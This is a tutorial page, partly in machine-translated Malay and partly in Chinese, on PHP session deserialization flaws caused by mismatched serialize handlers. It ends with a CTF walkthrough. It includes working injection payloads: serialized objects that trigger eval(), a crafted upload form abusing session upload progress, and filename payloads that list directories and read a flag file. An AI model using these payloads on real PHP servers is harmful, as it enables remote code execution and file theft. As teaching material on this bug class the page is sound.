Pengenalan terperinci kepada kelemahan penyahserialisasian sesi PHP

Artikel ini membawakan anda pengetahuan yang berkaitan tentang PHP, yang terutamanya memperkenalkan isu yang berkaitan dengan kerentanan penyahserikatan sesi, iaitu, mensiri dan menyimpan data Sesi serta menyahsiri dan membaca Sesi Kaedah data yang berbeza membawa kepada kelemahan penyahserikatan Sesi. Saya harap ia akan membantu semua orang.

Kajian yang disyorkan: "Tutorial Video PHP"

Kerentanan deserialisasi sesi PHP

PHP session kerentanan penyahserikatan berlaku apabila kaedah [mensiri dan menyimpan Session data] dan [menyahserialisasi dan membaca Session data] adalah berbeza, mengakibatkan session kerentanan penyahserilan

Apakah itu sesi

RasmiSessionDefinisi: Dalam komputer, terutamanya dalam aplikasi rangkaian, ia dipanggil "kawalan sesi". Session Objek menyimpan sifat dan maklumat konfigurasi yang diperlukan untuk sesi pengguna tertentu. Ciri-ciri utama adalah seperti berikut:

• sessionLokasi yang disimpan adalah di sebelah pelayan
• sessionBiasanya digunakan bersama dengan cookie

Kerana sifat HTTP tanpa kewarganegaraan, pelayan menjana session untuk mengenal pasti status pengguna semasa

Pada asasnya, session ialah teknologi storan data yang boleh mengekalkan bahagian pelayan. Iaitu, **session teknologi ialah teknologi yang menyimpan data sementara berdasarkan bahagian belakang yang berbeza daripada pangkalan data**

aliran kerja sesi PHP

Ambil PHP sebagai contoh untuk memahami session Prinsip

1. Apabila skrip PHP menggunakan session_start() untuk membuka sesi session, ia akan mengesan PHPSESSID secara automatik
   • Jika Cookie wujud, dapatkan PHPSESSID
   • Jika Cookie tidak wujud, buat PHPSESSID dan simpan ke penyemak imbas dalam bentuk Cookie melalui pengepala respons
2. Mulakan pembolehubah superglobal $_SESSION kepada tatasusunan kosong
3. PHP menggunakan PHPSESSID untuk menentukan lokasi (PHPSESSID lokasi storan fail) untuk dipadankan fail yang sepadan
   • Fail wujud: baca kandungan fail (melalui penyahserialisasian) dan simpan data dalam $_SESSION
   • Fail tidak wujud: session_start() mencipta PHPSESSID bernama fail
4. Pelaksanaan program tamat, dan semua data yang disimpan dalam $_SESSION akan disiri dan disimpan dalam fail yang sepadan PHPSESSID

Terperinci rajah skematik:

konfigurasi sesi php.ini

php.ini mengandungi item konfigurasi session yang lebih penting

session.save_path="/tmp"      --设置session文件的存储位置
session.save_handler=files    --设定用户自定义存储函数，如果想使用PHP内置session存储机制之外的可以使用这个函数
session.auto_start= 0          --指定会话模块是否在请求开始时启动一个会话，默认值为 0，不启动
session.serialize_handler= php --定义用来序列化/反序列化的处理器名字，默认使用php  
session.upload_progress.enabled= On --启用上传进度跟踪，并填充$ _SESSION变量，默认启用
session.upload_progress.cleanup= oN --读取所有POST数据（即完成上传）后立即清理进度信息，默认启用

Salin selepas log masuk

Mekanisme jujukan sesi PHP

Menurut item konfigurasi dalam php.ini, kami mengkaji tiga format pemprosesan berbeza yang digunakan untuk mensiri dan menyimpan semua data yang disimpan dalam $_SESSION ke dalam fail yang sepadan dengan PHPSESSID, iaitu Tiga enjin ditakrifkan oleh session.serialize_handler:

处理器	对应的存储格式
php	键名 ＋ 竖线 ＋ 经过 serialize() 函数反序列处理的值
php_binary	键名的长度对应的 ASCII 字符 ＋ 键名 ＋ 经过 serialize() 函数反序列处理的值
php_serialize (php>=5.5.4)	经过 serialize() 函数反序列处理的数组

pemproses php

Mula-mula, mari kita lihat hasil bersiri pada masa lalai session.serialize_handler = php Kodnya adalah seperti berikut

<?php//ini_set(&#39;session.serialize_handler&#39;,&#39;php&#39;);session_start();$_SESSION[&#39;name&#39;] = $_GET[&#39;name&#39;];echo $_SESSION[&#39;name&#39;];?>

Salin selepas log masuk

Untuk memudahkan tontonan, tetapkan session direktori storan kepada session.save_path = "/www/php_session" dan PHPSESSID fail adalah seperti berikut

1. Fail Nama fail

dinamakan sess_mpnnbont606f50eb178na451od, dengan mpnnbont606f50eb178na451od ialah nilai Cookie yang dibawa oleh PHPSESSID dalam pengepala permintaan berikutnya (seperti yang disimpan dalam pelayar di atas)

2. Kandungan fail

format storan pemproses php

键名	竖线	经过 serialize() 函数反序列处理的值
$_SESSION[‘name’]的键名：name	|	s:6:“harden”;

php_binary处理器

使用php_binary处理器，即session.serialize_handler = php_binary

<?phpini_set(&#39;session.serialize_handler&#39;,&#39;php_binary&#39;);session_start();# 为了方便ACSII显示，将键名设置为36个字符长度$_SESSION[&#39;namenamenamenamenamenamenamenamename&#39;] = $_GET[&#39;name&#39;];echo $_SESSION[&#39;namenamenamenamenamenamenamenamename&#39;];?>

Salin selepas log masuk

由于三种方式PHPSESSID文件名都是一样的，这里只需要查看文件内容

键名的长度对应的 ASCII 字符	键名	经过 serialize() 函数反序列处理的值.
$	namenamenamenamenamenamenamenamename	s:6:“harden”;

php_serialize 处理器

使用php_binary处理器，即session.serialize_handler = php_serialize

<?phpini_set(&#39;session.serialize_handler&#39;,&#39;php_serialize&#39;);session_start();$_SESSION[&#39;name&#39;] = $_GET[&#39;name&#39;];echo $_SESSION[&#39;name&#39;];?>

Salin selepas log masuk

文件内容即经过 serialize() 函数反序列处理的数组，a:1:{s:4:"name";s:6:"harden";}

session的反序列化漏洞利用

session的反序列化漏洞，就是利用php处理器和php_serialize处理器的存储格式差异而产生，通过具体的代码我们来看下漏洞出现的原因

漏洞成因

首先创建session.php，使用php_serialize处理器来存储session数据

<?phpini_set(&#39;session.serialize_handler&#39;,&#39;php_serialize&#39;);session_start();$_SESSION[&#39;session&#39;] = $_GET[&#39;session&#39;];echo $_SESSION[&#39;session&#39;];?>

Salin selepas log masuk

test.php，使用默认php处理器来存储session数据

<?phpsession_start();class f4ke{
    public $name;
    function __wakeup(){
      echo "Who are you?";
    }
    function __destruct(){
      eval($this->name);
    }}$str = new f4ke();?>

Salin selepas log masuk

接着，我们构建URL进行访问session.php：

http://www.session-serialize.com/session.php?session=|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}

Salin selepas log masuk

打开PHPSESSID文件可看到序列化存储的内容

a:1:{s:7:"session";s:45:"|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}

Salin selepas log masuk

漏洞分析：

在session.php程序执行，我们将|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}通过php_serialize处理器序列化保存成PHPSESSID文件；

由于浏览器中保存的PHPSESSID文件名不变，当我们访问test.php，session_start();找到PHPSESSID文件并使用php处理器反序列化文件内容，识别格式即

键名	竖线	经过 serialize() 函数反序列处理的值
a:1:{s:7:“session”;s:45:"	|	O:4:“f4ke”:1:{s:4:“name”;s:10:“phpinfo();”;}

php处理器会以|作为分隔符，将O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}反序列化，就会触发__wakeup()方法，最后对象销毁执行__destruct()方法中的eval()函数，相当于执行如下：

$_SESSION['session'] = new f4ke();$_SESSION['session']->name = 'phpinfo();';

Salin selepas log masuk

我们访问test.php，即可直接执行phpinfo()函数

CTF例题：PHPINFO

<?php//A webshell is wait for youini_set(&#39;session.serialize_handler&#39;, &#39;php&#39;);session_start();class OowoO{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }
    
    function __destruct()
    {
        eval($this->mdzz);
    }}if(isset($_GET['phpinfo'])){
    $m = new OowoO();}else{
    highlight_string(file_get_contents('index.php'));}?>

Salin selepas log masuk

我们可以看到ini_set('session.serialize_handler', 'php')，判断可能存在session反序列化漏洞，根据代码逻辑，访问URL加上phpinfo参数新建对象触发魔术方法执行phpinfo()函数，进一步查看session.serialize_handler配置

可见php.ini中session.serialize_handler = php_serialize，当前目录中被设置为session.serialize_handler = php，因此存在session反序列化利用的条件

补充知识

phpinfo文件中

local value(局部变量：作用于当前目录程序，会覆盖master value内容):php
master value(主变量：php.ini里面的内容):php_serialize

Salin selepas log masuk

那么我们如何找到代码入口将利用代码写入到session文件？想要写入session文件就得想办法在$_SESSION变量中增加我们可控的输入点

补充知识

当检测Session 上传进度这一特性是开启状态，我们可以在客户端写一个文件上传的功能，文件上传的同时，POST一个与php.ini中设置的session.upload_progress.name同名变量PHP_SESSION_UPLOAD_PROGRESS，如下图，即可写入$_SESSION，进一步序列化写入session文件

下面是官方给出的一个文件上传时监测进度例子:

<form action="upload.php" method="POST" enctype="multipart/form-data">
 <input type="hidden" name="<?php echo ini_get("session.upload_progress.name"); ?>" value="123" /> <input type="file" name="file1" />
 <input type="file" name="file2" />
 <input type="submit" /></form>

Salin selepas log masuk

其中name=""也可以设置为name="PHP_SESSION_UPLOAD_PROGRESS"

在session中存储的上传进度，如下所示:

<?php$_SESSION["upload_progress_123"] = array(
 "start_time" => 1234567890,   // The request time  请求时间
 "content_length" => 57343257, // POST content length 长度
 "bytes_processed" => 453489,  // Amount of bytes received and processed 已接收字节
 "done" => false,              // true when the POST handler has finished, successfully or not 是否上传完成
 "files" => array(//上传的文件
  0 => array(
   "field_name" => "file1",       // Name of the <input/> field  input中设定的变量名
   // The following 3 elements equals those in $_FILES             
   "name" => "foo.avi",           //文件名
   "tmp_name" => "/tmp/phpxxxxxx",
   "error" => 0,
   "done" => true,                // True when the POST handler has finished handling this file
   "start_time" => 1234567890,    // When this file has started to be processed
   "bytes_processed" => 57343250, // Amount of bytes received and processed for this file
  ),
  // An other file, not finished uploading, in the same request
  1 => array(
   "field_name" => "file2",
   "name" => "bar.avi",
   "tmp_name" => NULL,
   "error" => 0,
   "done" => false,
   "start_time" => 1234567899,
   "bytes_processed" => 54554,
  ),
 ));

Salin selepas log masuk

其中，session中的field_name和name都是我们可控的输入点！

下面我们就开始解题拿到flag

首先，http://web.jarvisoj.com:32784/index.php?phpinfo查询设置

session.upload_progress.enabled = On   --表明允许上传进度跟踪，并填充$ _SESSION变量
session.upload_progress.cleanup = Off  --表明所有POST数据（即完成上传）后，不清理进度信息($ _SESSION变量)

Salin selepas log masuk

即允许上传进度跟踪且结束后不清除数据，更有利使用session.upload_progress.name来将利用代码写入session文件

构造POST表单提交上传文件

<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
 <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
 <input type="file" name="file" />
 <input type="submit" /></form>

Salin selepas log masuk

构造序列化字符串作为payload（利用代码）

<?phpclass OowoO{
    public $mdzz=&#39;print_r(scandir(dirname(__FILE__)));&#39;;}$obj = new OowoO();echo serialize($obj);?>//O:5:"OowoO":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}

Salin selepas log masuk

为了防止"被转义，我们在payload中加入\

随意选择文件，点击表单提交，使用抓包工具burpsuite抓取请求包

并修改filename值为

|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}

Salin selepas log masuk

发送请求包，代码执行过程分析：

因此直接执行print_r(scandir(dirname(__FILE__)));并返回

phpinfo查看当前目录，/opt/lampp/htdocs/

构造最终payload读取Here_1s_7he_fl4g_buT_You_Cannot_see.php文件内容，即flag

|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}

Salin selepas log masuk

推荐学习：《PHP视频教程》

Atas ialah kandungan terperinci Pengenalan terperinci kepada kelemahan penyahserialisasian sesi PHP. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!